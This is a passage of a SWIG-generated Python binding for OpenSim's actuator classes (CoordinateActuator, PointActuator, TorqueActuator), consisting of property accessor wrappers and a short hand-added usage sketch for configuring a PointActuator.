return _actuators.SwigPyIterator_equal(self, x)
def copy(self):
"""
copy(SwigPyIterator self) -> SwigPyIterator
Parameters
----------
self: swig::SwigPyIterator const *
"""
return _actuators.SwigPyIterator_copy(self)
def next(self):
"""
next(SwigPyIterator self) -> PyObject *
Parameters
----------
self: swig::SwigPyIterator *
"""
return _actuators.SwigPyIterator_next(self)
def __next__(self):
"""
__next__(SwigPyIterator self) -> PyObject *
Parameters
----------
self: swig::SwigPyIterator *
"""
return _actuators.SwigPyIterator___next__(self)
def previous(self):
"""
previous(SwigPyIterator self) -> PyObject *
Parameters
----------
self: swig::SwigPyIterator *
"""
return _actuators.SwigPyIterator_previous(self)
def advance(self, n):
"""
advance(SwigPyIterator self, ptrdiff_t n) -> SwigPyIterator
Parameters
----------
n: ptrdiff_t
"""
return _actuators.SwigPyIterator_advance(self, n)
def __eq__(self, x):
"""
__eq__(SwigPyIterator self, SwigPyIterator x) -> bool
Parameters
----------
x: swig::SwigPyIterator const &
"""
return _actuators.SwigPyIterator___eq__(self, x)
def __ne__(self, x):
"""
__ne__(SwigPyIterator self, SwigPyIterator x) -> bool
Parameters
----------
x: swig::SwigPyIterator const &
"""
return _actuators.SwigPyIterator___ne__(self, x)
def __iadd__(self, n):
"""
__iadd__(SwigPyIterator self, ptrdiff_t n) -> SwigPyIterator
Parameters
----------
n: ptrdiff_t
"""
return _actuators.SwigPyIterator___iadd__(self, n)
def __isub__(self, n):
"""
__isub__(SwigPyIterator self, ptrdiff_t n) -> SwigPyIterator
Parameters
----------
n: ptrdiff_t
"""
return _actuators.SwigPyIterator___isub__(self, n)
def __add__(self, n):
"""
__add__(SwigPyIterator self, ptrdiff_t n) -> SwigPyIterator
Parameters
----------
n: ptrdiff_t
"""
return _actuators.SwigPyIterator___add__(self, n)
def __sub__(self, *args):
"""
__sub__(SwigPyIterator self, ptrdiff_t n) -> SwigPyIterator
Parameters
----------
n: ptrdiff_t
__sub__(SwigPyIterator self, SwigPyIterator x) -> ptrdiff_t
Parameters
----------
x: swig::SwigPyIterator const &
"""
return _actuators.SwigPyIterator___sub__(self, *args)
def __iter__(self):
return self
SwigPyIterator_swigregister = _actuators.SwigPyIterator_swigregister
SwigPyIterator_swigregister(SwigPyIterator)
import opensim.simulation
import opensim.common
import opensim.simbody
class CoordinateActuator(opensim.simulation.ScalarActuator):
"""Proxy of C++ OpenSim::CoordinateActuator class."""
__swig_setmethods__ = {}
for _s in [opensim.simulation.ScalarActuator]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, CoordinateActuator, name, value)
__swig_getmethods__ = {}
for _s in [opensim.simulation.ScalarActuator]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, CoordinateActuator, name)
__repr__ = _swig_repr
def safeDownCast(obj):
"""
safeDownCast(OpenSimObject obj) -> CoordinateActuator
Parameters
----------
obj: OpenSim::Object *
"""
return _actuators.CoordinateActuator_safeDownCast(obj)
safeDownCast = staticmethod(safeDownCast)
def assign(self, aObject):
"""
assign(CoordinateActuator self, OpenSimObject aObject)
Parameters
----------
aObject: OpenSim::Object &
"""
return _actuators.CoordinateActuator_assign(self, aObject)
def getClassName():
"""getClassName() -> std::string const &"""
return _actuators.CoordinateActuator_getClassName()
getClassName = staticmethod(getClassName)
def clone(self):
"""
clone(CoordinateActuator self) -> CoordinateActuator
Parameters
----------
self: OpenSim::CoordinateActuator const *
"""
return _actuators.CoordinateActuator_clone(self)
def getConcreteClassName(self):
"""
getConcreteClassName(CoordinateActuator self) -> std::string const &
Parameters
----------
self: OpenSim::CoordinateActuator const *
"""
return _actuators.CoordinateActuator_getConcreteClassName(self)
def copyProperty_coordinate(self, source):
"""
copyProperty_coordinate(CoordinateActuator self, CoordinateActuator source)
Parameters
----------
source: OpenSim::CoordinateActuator::Self const &
"""
return _actuators.CoordinateActuator_copyProperty_coordinate(self, source)
def append_coordinate(self, value):
"""
append_coordinate(CoordinateActuator self, std::string const & value) -> int
Parameters
----------
value: std::string const &
"""
return _actuators.CoordinateActuator_append_coordinate(self, value)
def constructProperty_coordinate(self, *args):
"""
constructProperty_coordinate(CoordinateActuator self)
constructProperty_coordinate(CoordinateActuator self, std::string const & initValue)
Parameters
----------
initValue: std::string const &
"""
return _actuators.CoordinateActuator_constructProperty_coordinate(self, *args)
def get_coordinate(self, *args):
"""
get_coordinate(CoordinateActuator self, int i) -> std::string const
Parameters
----------
i: int
get_coordinate(CoordinateActuator self) -> std::string const &
Parameters
----------
self: OpenSim::CoordinateActuator const *
"""
return _actuators.CoordinateActuator_get_coordinate(self, *args)
def upd_coordinate(self, *args):
"""
upd_coordinate(CoordinateActuator self, int i) -> std::string
Parameters
----------
i: int
upd_coordinate(CoordinateActuator self) -> std::string &
Parameters
----------
self: OpenSim::CoordinateActuator *
"""
return _actuators.CoordinateActuator_upd_coordinate(self, *args)
def set_coordinate(self, *args):
"""
set_coordinate(CoordinateActuator self, int i, std::string const & value)
Parameters
----------
i: int
value: std::string const &
set_coordinate(CoordinateActuator self, std::string const & value)
Parameters
----------
value: std::string const &
"""
return _actuators.CoordinateActuator_set_coordinate(self, *args)
def copyProperty_optimal_force(self, source):
"""
copyProperty_optimal_force(CoordinateActuator self, CoordinateActuator source)
Parameters
----------
source: OpenSim::CoordinateActuator::Self const &
"""
return _actuators.CoordinateActuator_copyProperty_optimal_force(self, source)
def append_optimal_force(self, value):
"""
append_optimal_force(CoordinateActuator self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.CoordinateActuator_append_optimal_force(self, value)
def constructProperty_optimal_force(self, initValue):
"""
constructProperty_optimal_force(CoordinateActuator self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.CoordinateActuator_constructProperty_optimal_force(self, initValue)
def get_optimal_force(self, *args):
"""
get_optimal_force(CoordinateActuator self, int i) -> double const
Parameters
----------
i: int
get_optimal_force(CoordinateActuator self) -> double const &
Parameters
----------
self: OpenSim::CoordinateActuator const *
"""
return _actuators.CoordinateActuator_get_optimal_force(self, *args)
def upd_optimal_force(self, *args):
"""
upd_optimal_force(CoordinateActuator self, int i) -> double
Parameters
----------
i: int
upd_optimal_force(CoordinateActuator self) -> double &
Parameters
----------
self: OpenSim::CoordinateActuator *
"""
return _actuators.CoordinateActuator_upd_optimal_force(self, *args)
def set_optimal_force(self, *args):
"""
set_optimal_force(CoordinateActuator self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_optimal_force(CoordinateActuator self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.CoordinateActuator_set_optimal_force(self, *args)
def __init__(self, *args):
"""
__init__(OpenSim::CoordinateActuator self, std::string const & coordinateName) -> CoordinateActuator
Parameters
----------
coordinateName: std::string const &
__init__(OpenSim::CoordinateActuator self) -> CoordinateActuator
"""
this = _actuators.new_CoordinateActuator(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def setOptimalForce(self, optimalForce):
"""
setOptimalForce(CoordinateActuator self, double optimalForce)
Parameters
----------
optimalForce: double
"""
return _actuators.CoordinateActuator_setOptimalForce(self, optimalForce)
def getOptimalForce(self):
"""
getOptimalForce(CoordinateActuator self) -> double
Parameters
----------
self: OpenSim::CoordinateActuator const *
"""
return _actuators.CoordinateActuator_getOptimalForce(self)
def CreateForceSetOfCoordinateActuatorsForModel(s, aModel, aOptimalForce=1, aIncludeLockedAndConstrainedCoordinates=True):
"""
CreateForceSetOfCoordinateActuatorsForModel(State s, Model aModel, double aOptimalForce=1, bool aIncludeLockedAndConstrainedCoordinates=True) -> ForceSet
Parameters
----------
s: SimTK::State const &
aModel: OpenSim::Model &
aOptimalForce: double
aIncludeLockedAndConstrainedCoordinates: bool
CreateForceSetOfCoordinateActuatorsForModel(State s, Model aModel, double aOptimalForce=1) -> ForceSet
Parameters
----------
s: SimTK::State const &
aModel: OpenSim::Model &
aOptimalForce: double
CreateForceSetOfCoordinateActuatorsForModel(State s, Model aModel) -> ForceSet
Parameters
----------
s: SimTK::State const &
aModel: OpenSim::Model &
"""
return _actuators.CoordinateActuator_CreateForceSetOfCoordinateActuatorsForModel(s, aModel, aOptimalForce, aIncludeLockedAndConstrainedCoordinates)
CreateForceSetOfCoordinateActuatorsForModel = staticmethod(CreateForceSetOfCoordinateActuatorsForModel)
def isCoordinateValid(self):
"""
isCoordinateValid(CoordinateActuator self) -> bool
Parameters
----------
self: OpenSim::CoordinateActuator const *
"""
return _actuators.CoordinateActuator_isCoordinateValid(self)
def getSpeed(self, s):
"""
getSpeed(CoordinateActuator self, State s) -> double
Parameters
----------
s: SimTK::State const &
"""
return _actuators.CoordinateActuator_getSpeed(self, s)
def setCoordinate(self, aCoordinate):
"""
setCoordinate(CoordinateActuator self, Coordinate aCoordinate)
Parameters
----------
aCoordinate: OpenSim::Coordinate *
"""
return _actuators.CoordinateActuator_setCoordinate(self, aCoordinate)
def getCoordinate(self):
"""
getCoordinate(CoordinateActuator self) -> Coordinate
Parameters
----------
self: OpenSim::CoordinateActuator const *
"""
return _actuators.CoordinateActuator_getCoordinate(self)
__swig_destroy__ = _actuators.delete_CoordinateActuator
__del__ = lambda self: None
CoordinateActuator_swigregister = _actuators.CoordinateActuator_swigregister
CoordinateActuator_swigregister(CoordinateActuator)
def CoordinateActuator_safeDownCast(obj):
"""
CoordinateActuator_safeDownCast(OpenSimObject obj) -> CoordinateActuator
Parameters
----------
obj: OpenSim::Object *
"""
return _actuators.CoordinateActuator_safeDownCast(obj)
def CoordinateActuator_getClassName():
"""CoordinateActuator_getClassName() -> std::string const &"""
return _actuators.CoordinateActuator_getClassName()
def CoordinateActuator_CreateForceSetOfCoordinateActuatorsForModel(s, aModel, aOptimalForce=1, aIncludeLockedAndConstrainedCoordinates=True):
"""
CreateForceSetOfCoordinateActuatorsForModel(State s, Model aModel, double aOptimalForce=1, bool aIncludeLockedAndConstrainedCoordinates=True) -> ForceSet
Parameters
----------
s: SimTK::State const &
aModel: OpenSim::Model &
aOptimalForce: double
aIncludeLockedAndConstrainedCoordinates: bool
CreateForceSetOfCoordinateActuatorsForModel(State s, Model aModel, double aOptimalForce=1) -> ForceSet
Parameters
----------
s: SimTK::State const &
aModel: OpenSim::Model &
aOptimalForce: double
CoordinateActuator_CreateForceSetOfCoordinateActuatorsForModel(State s, Model aModel) -> ForceSet
Parameters
----------
s: SimTK::State const &
aModel: OpenSim::Model &
"""
return _actuators.CoordinateActuator_CreateForceSetOfCoordinateActuatorsForModel(s, aModel, aOptimalForce, aIncludeLockedAndConstrainedCoordinates)
class PointActuator(opensim.simulation.ScalarActuator):
"""Proxy of C++ OpenSim::PointActuator class."""
__swig_setmethods__ = {}
for _s in [opensim.simulation.ScalarActuator]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, PointActuator, name, value)
__swig_getmethods__ = {}
for _s in [opensim.simulation.ScalarActuator]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, PointActuator, name)
__repr__ = _swig_repr
def safeDownCast(obj):
"""
safeDownCast(OpenSimObject obj) -> PointActuator
Parameters
----------
obj: OpenSim::Object *
"""
return _actuators.PointActuator_safeDownCast(obj)
safeDownCast = staticmethod(safeDownCast)
def assign(self, aObject):
"""
assign(PointActuator self, OpenSimObject aObject)
Parameters
----------
aObject: OpenSim::Object &
"""
return _actuators.PointActuator_assign(self, aObject)
def getClassName():
"""getClassName() -> std::string const &"""
return _actuators.PointActuator_getClassName()
getClassName = staticmethod(getClassName)
def clone(self):
"""
clone(PointActuator self) -> PointActuator
Parameters
----------
self: OpenSim::PointActuator const *
"""
return _actuators.PointActuator_clone(self)
def getConcreteClassName(self):
"""
getConcreteClassName(PointActuator self) -> std::string const &
Parameters
----------
self: OpenSim::PointActuator const *
"""
return _actuators.PointActuator_getConcreteClassName(self)
def copyProperty_body(self, source):
"""
copyProperty_body(PointActuator self, PointActuator source)
Parameters
----------
source: OpenSim::PointActuator::Self const &
"""
return _actuators.PointActuator_copyProperty_body(self, source)
def append_body(self, value):
"""
append_body(PointActuator self, std::string const & value) -> int
Parameters
----------
value: std::string const &
"""
return _actuators.PointActuator_append_body(self, value)
def constructProperty_body(self, *args):
"""
constructProperty_body(PointActuator self)
constructProperty_body(PointActuator self, std::string const & initValue)
Parameters
----------
initValue: std::string const &
"""
return _actuators.PointActuator_constructProperty_body(self, *args)
def get_body(self, *args):
"""
get_body(PointActuator self, int i) -> std::string const
Parameters
----------
i: int
get_body(PointActuator self) -> std::string const &
Parameters
----------
self: OpenSim::PointActuator const *
"""
return _actuators.PointActuator_get_body(self, *args)
def upd_body(self, *args):
"""
upd_body(PointActuator self, int i) -> std::string
Parameters
----------
i: int
upd_body(PointActuator self) -> std::string &
Parameters
----------
self: OpenSim::PointActuator *
"""
return _actuators.PointActuator_upd_body(self, *args)
def set_body(self, *args):
"""
set_body(PointActuator self, int i, std::string const & value)
Parameters
----------
i: int
value: std::string const &
set_body(PointActuator self, std::string const & value)
Parameters
----------
value: std::string const &
"""
return _actuators.PointActuator_set_body(self, *args)
def copyProperty_point(self, source):
"""
copyProperty_point(PointActuator self, PointActuator source)
Parameters
----------
source: OpenSim::PointActuator::Self const &
"""
return _actuators.PointActuator_copyProperty_point(self, source)
def append_point(self, value):
"""
append_point(PointActuator self, Vec3 value) -> int
Parameters
----------
value: SimTK::Vec3 const &
"""
return _actuators.PointActuator_append_point(self, value)
def constructProperty_point(self, initValue):
"""
constructProperty_point(PointActuator self, Vec3 initValue)
Parameters
----------
initValue: SimTK::Vec3 const &
"""
return _actuators.PointActuator_constructProperty_point(self, initValue)
def get_point(self, *args):
"""
get_point(PointActuator self, int i) -> Vec3
Parameters
----------
i: int
get_point(PointActuator self) -> Vec3
Parameters
----------
self: OpenSim::PointActuator const *
"""
return _actuators.PointActuator_get_point(self, *args)
def upd_point(self, *args):
"""
upd_point(PointActuator self, int i) -> Vec3
Parameters
----------
i: int
upd_point(PointActuator self) -> Vec3
Parameters
----------
self: OpenSim::PointActuator *
"""
return _actuators.PointActuator_upd_point(self, *args)
def set_point(self, *args):
"""
set_point(PointActuator self, int i, Vec3 value)
Parameters
----------
i: int
value: SimTK::Vec3 const &
set_point(PointActuator self, Vec3 value)
Parameters
----------
value: SimTK::Vec3 const &
"""
return _actuators.PointActuator_set_point(self, *args)
def copyProperty_point_is_global(self, source):
"""
copyProperty_point_is_global(PointActuator self, PointActuator source)
Parameters
----------
source: OpenSim::PointActuator::Self const &
"""
return _actuators.PointActuator_copyProperty_point_is_global(self, source)
def append_point_is_global(self, value):
"""
append_point_is_global(PointActuator self, bool const & value) -> int
Parameters
----------
value: bool const &
"""
return _actuators.PointActuator_append_point_is_global(self, value)
def constructProperty_point_is_global(self, initValue):
"""
constructProperty_point_is_global(PointActuator self, bool const & initValue)
Parameters
----------
initValue: bool const &
"""
return _actuators.PointActuator_constructProperty_point_is_global(self, initValue)
def get_point_is_global(self, *args):
"""
get_point_is_global(PointActuator self, int i) -> bool const
Parameters
----------
i: int
get_point_is_global(PointActuator self) -> bool const &
Parameters
----------
self: OpenSim::PointActuator const *
"""
return _actuators.PointActuator_get_point_is_global(self, *args)
def upd_point_is_global(self, *args):
"""
upd_point_is_global(PointActuator self, int i) -> bool
Parameters
----------
i: int
upd_point_is_global(PointActuator self) -> bool &
Parameters
----------
self: OpenSim::PointActuator *
"""
return _actuators.PointActuator_upd_point_is_global(self, *args)
def set_point_is_global(self, *args):
"""
set_point_is_global(PointActuator self, int i, bool const & value)
Parameters
----------
i: int
value: bool const &
set_point_is_global(PointActuator self, bool const & value)
Parameters
----------
value: bool const &
"""
return _actuators.PointActuator_set_point_is_global(self, *args)
def copyProperty_direction(self, source):
"""
copyProperty_direction(PointActuator self, PointActuator source)
Parameters
----------
source: OpenSim::PointActuator::Self const &
"""
return _actuators.PointActuator_copyProperty_direction(self, source)
def append_direction(self, value):
"""
append_direction(PointActuator self, Vec3 value) -> int
Parameters
----------
value: SimTK::Vec3 const &
"""
return _actuators.PointActuator_append_direction(self, value)
def constructProperty_direction(self, initValue):
"""
constructProperty_direction(PointActuator self, Vec3 initValue)
Parameters
----------
initValue: SimTK::Vec3 const &
"""
return _actuators.PointActuator_constructProperty_direction(self, initValue)
def get_direction(self, *args):
"""
get_direction(PointActuator self, int i) -> Vec3
Parameters
----------
i: int
get_direction(PointActuator self) -> Vec3
Parameters
----------
self: OpenSim::PointActuator const *
"""
return _actuators.PointActuator_get_direction(self, *args)
def upd_direction(self, *args):
"""
upd_direction(PointActuator self, int i) -> Vec3
Parameters
----------
i: int
upd_direction(PointActuator self) -> Vec3
Parameters
----------
self: OpenSim::PointActuator *
"""
return _actuators.PointActuator_upd_direction(self, *args)
def set_direction(self, *args):
"""
set_direction(PointActuator self, int i, Vec3 value)
Parameters
----------
i: int
value: SimTK::Vec3 const &
set_direction(PointActuator self, Vec3 value)
Parameters
----------
value: SimTK::Vec3 const &
"""
return _actuators.PointActuator_set_direction(self, *args)
def copyProperty_force_is_global(self, source):
"""
copyProperty_force_is_global(PointActuator self, PointActuator source)
Parameters
----------
source: OpenSim::PointActuator::Self const &
"""
return _actuators.PointActuator_copyProperty_force_is_global(self, source)
def append_force_is_global(self, value):
"""
append_force_is_global(PointActuator self, bool const & value) -> int
Parameters
----------
value: bool const &
"""
return _actuators.PointActuator_append_force_is_global(self, value)
def constructProperty_force_is_global(self, initValue):
"""
constructProperty_force_is_global(PointActuator self, bool const & initValue)
Parameters
----------
initValue: bool const &
"""
return _actuators.PointActuator_constructProperty_force_is_global(self, initValue)
def get_force_is_global(self, *args):
"""
get_force_is_global(PointActuator self, int i) -> bool const
Parameters
----------
i: int
get_force_is_global(PointActuator self) -> bool const &
Parameters
----------
self: OpenSim::PointActuator const *
"""
return _actuators.PointActuator_get_force_is_global(self, *args)
def upd_force_is_global(self, *args):
"""
upd_force_is_global(PointActuator self, int i) -> bool
Parameters
----------
i: int
upd_force_is_global(PointActuator self) -> bool &
Parameters
----------
self: OpenSim::PointActuator *
"""
return _actuators.PointActuator_upd_force_is_global(self, *args)
def set_force_is_global(self, *args):
"""
set_force_is_global(PointActuator self, int i, bool const & value)
Parameters
----------
i: int
value: bool const &
set_force_is_global(PointActuator self, bool const & value)
Parameters
----------
value: bool const &
"""
return _actuators.PointActuator_set_force_is_global(self, *args)
def copyProperty_optimal_force(self, source):
"""
copyProperty_optimal_force(PointActuator self, PointActuator source)
Parameters
----------
source: OpenSim::PointActuator::Self const &
"""
return _actuators.PointActuator_copyProperty_optimal_force(self, source)
def append_optimal_force(self, value):
"""
append_optimal_force(PointActuator self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.PointActuator_append_optimal_force(self, value)
def constructProperty_optimal_force(self, initValue):
"""
constructProperty_optimal_force(PointActuator self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.PointActuator_constructProperty_optimal_force(self, initValue)
def get_optimal_force(self, *args):
"""
get_optimal_force(PointActuator self, int i) -> double const
Parameters
----------
i: int
get_optimal_force(PointActuator self) -> double const &
Parameters
----------
self: OpenSim::PointActuator const *
"""
return _actuators.PointActuator_get_optimal_force(self, *args)
def upd_optimal_force(self, *args):
"""
upd_optimal_force(PointActuator self, int i) -> double
Parameters
----------
i: int
upd_optimal_force(PointActuator self) -> double &
Parameters
----------
self: OpenSim::PointActuator *
"""
return _actuators.PointActuator_upd_optimal_force(self, *args)
def set_optimal_force(self, *args):
"""
set_optimal_force(PointActuator self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_optimal_force(PointActuator self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.PointActuator_set_optimal_force(self, *args)
def __init__(self, *args):
"""
__init__(OpenSim::PointActuator self, std::string const & bodyName) -> PointActuator
Parameters
----------
bodyName: std::string const &
__init__(OpenSim::PointActuator self) -> PointActuator
"""
this = _actuators.new_PointActuator(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def setOptimalForce(self, aOptimalForce):
"""
setOptimalForce(PointActuator self, double aOptimalForce)
Parameters
----------
aOptimalForce: double
"""
return _actuators.PointActuator_setOptimalForce(self, aOptimalForce)
def getOptimalForce(self):
"""
getOptimalForce(PointActuator self) -> double
Parameters
----------
self: OpenSim::PointActuator const *
"""
return _actuators.PointActuator_getOptimalForce(self)
__swig_destroy__ = _actuators.delete_PointActuator
__del__ = lambda self: None
PointActuator_swigregister = _actuators.PointActuator_swigregister
PointActuator_swigregister(PointActuator)
def PointActuator_safeDownCast(obj):
"""
PointActuator_safeDownCast(OpenSimObject obj) -> PointActuator
Parameters
----------
obj: OpenSim::Object *
"""
return _actuators.PointActuator_safeDownCast(obj)
def PointActuator_getClassName():
"""PointActuator_getClassName() -> std::string const &"""
return _actuators.PointActuator_getClassName()
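# --- Illustrative usage sketch (hand-added; not SWIG-generated) -------------
# Minimal example of configuring a PointActuator through the accessors
# defined above. The body name 'torso' and all numeric values are
# hypothetical; 'model' is assumed to be an opensim.Model that owns a body
# with that name, and Vec3/addForce are assumed available from the
# top-level opensim package.
def _example_point_actuator(model):
    import opensim  # Vec3 is re-exported by the top-level package
    act = PointActuator('torso')              # actuate a point on body 'torso'
    act.set_direction(opensim.Vec3(1, 0, 0))  # line of action of the force
    act.set_force_is_global(True)             # direction expressed in ground frame
    act.setOptimalForce(100.0)                # force produced at unit control (N)
    model.addForce(act)                       # hand ownership to the model
    return act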
class TorqueActuator(opensim.simulation.ScalarActuator):
"""Proxy of C++ OpenSim::TorqueActuator class."""
__swig_setmethods__ = {}
for _s in [opensim.simulation.ScalarActuator]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, TorqueActuator, name, value)
__swig_getmethods__ = {}
for _s in [opensim.simulation.ScalarActuator]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, TorqueActuator, name)
__repr__ = _swig_repr
def safeDownCast(obj):
"""
safeDownCast(OpenSimObject obj) -> TorqueActuator
Parameters
----------
obj: OpenSim::Object *
"""
return _actuators.TorqueActuator_safeDownCast(obj)
safeDownCast = staticmethod(safeDownCast)
def assign(self, aObject):
"""
assign(TorqueActuator self, OpenSimObject aObject)
Parameters
----------
aObject: OpenSim::Object &
"""
return _actuators.TorqueActuator_assign(self, aObject)
def getClassName():
"""getClassName() -> std::string const &"""
return _actuators.TorqueActuator_getClassName()
getClassName = staticmethod(getClassName)
def clone(self):
"""
clone(TorqueActuator self) -> TorqueActuator
Parameters
----------
self: OpenSim::TorqueActuator const *
"""
return _actuators.TorqueActuator_clone(self)
def getConcreteClassName(self):
"""
getConcreteClassName(TorqueActuator self) -> std::string const &
Parameters
----------
self: OpenSim::TorqueActuator const *
"""
return _actuators.TorqueActuator_getConcreteClassName(self)
def copyProperty_bodyA(self, source):
"""
copyProperty_bodyA(TorqueActuator self, TorqueActuator source)
Parameters
----------
source: OpenSim::TorqueActuator::Self const &
"""
return _actuators.TorqueActuator_copyProperty_bodyA(self, source)
def append_bodyA(self, value):
"""
append_bodyA(TorqueActuator self, std::string const & value) -> int
Parameters
----------
value: std::string const &
"""
return _actuators.TorqueActuator_append_bodyA(self, value)
def constructProperty_bodyA(self, *args):
"""
constructProperty_bodyA(TorqueActuator self)
constructProperty_bodyA(TorqueActuator self, std::string const & initValue)
Parameters
----------
initValue: std::string const &
"""
return _actuators.TorqueActuator_constructProperty_bodyA(self, *args)
def get_bodyA(self, *args):
"""
get_bodyA(TorqueActuator self, int i) -> std::string const
Parameters
----------
i: int
get_bodyA(TorqueActuator self) -> std::string const &
Parameters
----------
self: OpenSim::TorqueActuator const *
"""
return _actuators.TorqueActuator_get_bodyA(self, *args)
def upd_bodyA(self, *args):
"""
upd_bodyA(TorqueActuator self, int i) -> std::string
Parameters
----------
i: int
upd_bodyA(TorqueActuator self) -> std::string &
Parameters
----------
self: OpenSim::TorqueActuator *
"""
return _actuators.TorqueActuator_upd_bodyA(self, *args)
def set_bodyA(self, *args):
"""
set_bodyA(TorqueActuator self, int i, std::string const & value)
Parameters
----------
i: int
value: std::string const &
set_bodyA(TorqueActuator self, std::string const & value)
Parameters
----------
value: std::string const &
"""
return _actuators.TorqueActuator_set_bodyA(self, *args)
def copyProperty_bodyB(self, source):
"""
copyProperty_bodyB(TorqueActuator self, TorqueActuator source)
Parameters
----------
source: OpenSim::TorqueActuator::Self const &
"""
return _actuators.TorqueActuator_copyProperty_bodyB(self, source)
def append_bodyB(self, value):
"""
append_bodyB(TorqueActuator self, std::string const & value) -> int
Parameters
----------
value: std::string const &
"""
return _actuators.TorqueActuator_append_bodyB(self, value)
def constructProperty_bodyB(self, *args):
"""
constructProperty_bodyB(TorqueActuator self)
constructProperty_bodyB(TorqueActuator self, std::string const & initValue)
Parameters
----------
initValue: std::string const &
"""
return _actuators.TorqueActuator_constructProperty_bodyB(self, *args)
def get_bodyB(self, *args):
"""
get_bodyB(TorqueActuator self, int i) -> std::string const
Parameters
----------
i: int
get_bodyB(TorqueActuator self) -> std::string const &
Parameters
----------
self: OpenSim::TorqueActuator const *
"""
return _actuators.TorqueActuator_get_bodyB(self, *args)
def upd_bodyB(self, *args):
"""
upd_bodyB(TorqueActuator self, int i) -> std::string
Parameters
----------
i: int
upd_bodyB(TorqueActuator self) -> std::string &
Parameters
----------
self: OpenSim::TorqueActuator *
"""
return _actuators.TorqueActuator_upd_bodyB(self, *args)
def set_bodyB(self, *args):
"""
set_bodyB(TorqueActuator self, int i, std::string const & value)
Parameters
----------
i: int
value: std::string const &
set_bodyB(TorqueActuator self, std::string const & value)
Parameters
----------
value: std::string const &
"""
return _actuators.TorqueActuator_set_bodyB(self, *args)
def copyProperty_torque_is_global(self, source):
"""
copyProperty_torque_is_global(TorqueActuator self, TorqueActuator source)
Parameters
----------
source: OpenSim::TorqueActuator::Self const &
"""
return _actuators.TorqueActuator_copyProperty_torque_is_global(self, source)
def append_torque_is_global(self, value):
"""
append_torque_is_global(TorqueActuator self, bool const & value) -> int
Parameters
----------
value: bool const &
"""
return _actuators.TorqueActuator_append_torque_is_global(self, value)
def constructProperty_torque_is_global(self, initValue):
"""
constructProperty_torque_is_global(TorqueActuator self, bool const & initValue)
Parameters
----------
initValue: bool const &
"""
return _actuators.TorqueActuator_constructProperty_torque_is_global(self, initValue)
def get_torque_is_global(self, *args):
"""
get_torque_is_global(TorqueActuator self, int i) -> bool const
Parameters
----------
i: int
get_torque_is_global(TorqueActuator self) -> bool const &
Parameters
----------
self: OpenSim::TorqueActuator const *
"""
return _actuators.TorqueActuator_get_torque_is_global(self, *args)
def upd_torque_is_global(self, *args):
"""
upd_torque_is_global(TorqueActuator self, int i) -> bool
Parameters
----------
i: int
upd_torque_is_global(TorqueActuator self) -> bool &
Parameters
----------
self: OpenSim::TorqueActuator *
"""
return _actuators.TorqueActuator_upd_torque_is_global(self, *args)
def set_torque_is_global(self, *args):
"""
set_torque_is_global(TorqueActuator self, int i, bool const & value)
Parameters
----------
i: int
value: bool const &
set_torque_is_global(TorqueActuator self, bool const & value)
Parameters
----------
value: bool const &
"""
return _actuators.TorqueActuator_set_torque_is_global(self, *args)
def copyProperty_axis(self, source):
"""
copyProperty_axis(TorqueActuator self, TorqueActuator source)
Parameters
----------
source: OpenSim::TorqueActuator::Self const &
"""
return _actuators.TorqueActuator_copyProperty_axis(self, source)
def append_axis(self, value):
"""
append_axis(TorqueActuator self, Vec3 value) -> int
Parameters
----------
value: SimTK::Vec3 const &
"""
return _actuators.TorqueActuator_append_axis(self, value)
def constructProperty_axis(self, initValue):
"""
constructProperty_axis(TorqueActuator self, Vec3 initValue)
Parameters
----------
initValue: SimTK::Vec3 const &
"""
return _actuators.TorqueActuator_constructProperty_axis(self, initValue)
def get_axis(self, *args):
"""
get_axis(TorqueActuator self, int i) -> Vec3
Parameters
----------
i: int
get_axis(TorqueActuator self) -> Vec3
Parameters
----------
self: OpenSim::TorqueActuator const *
"""
return _actuators.TorqueActuator_get_axis(self, *args)
def upd_axis(self, *args):
"""
upd_axis(TorqueActuator self, int i) -> Vec3
Parameters
----------
i: int
upd_axis(TorqueActuator self) -> Vec3
Parameters
----------
self: OpenSim::TorqueActuator *
"""
return _actuators.TorqueActuator_upd_axis(self, *args)
def set_axis(self, *args):
"""
set_axis(TorqueActuator self, int i, Vec3 value)
Parameters
----------
i: int
value: SimTK::Vec3 const &
set_axis(TorqueActuator self, Vec3 value)
Parameters
----------
value: SimTK::Vec3 const &
"""
return _actuators.TorqueActuator_set_axis(self, *args)
def copyProperty_optimal_force(self, source):
"""
copyProperty_optimal_force(TorqueActuator self, TorqueActuator source)
Parameters
----------
source: OpenSim::TorqueActuator::Self const &
"""
return _actuators.TorqueActuator_copyProperty_optimal_force(self, source)
def append_optimal_force(self, value):
"""
append_optimal_force(TorqueActuator self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.TorqueActuator_append_optimal_force(self, value)
def constructProperty_optimal_force(self, initValue):
"""
constructProperty_optimal_force(TorqueActuator self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.TorqueActuator_constructProperty_optimal_force(self, initValue)
def get_optimal_force(self, *args):
"""
get_optimal_force(TorqueActuator self, int i) -> double const
Parameters
----------
i: int
get_optimal_force(TorqueActuator self) -> double const &
Parameters
----------
self: OpenSim::TorqueActuator const *
"""
return _actuators.TorqueActuator_get_optimal_force(self, *args)
def upd_optimal_force(self, *args):
"""
upd_optimal_force(TorqueActuator self, int i) -> double
Parameters
----------
i: int
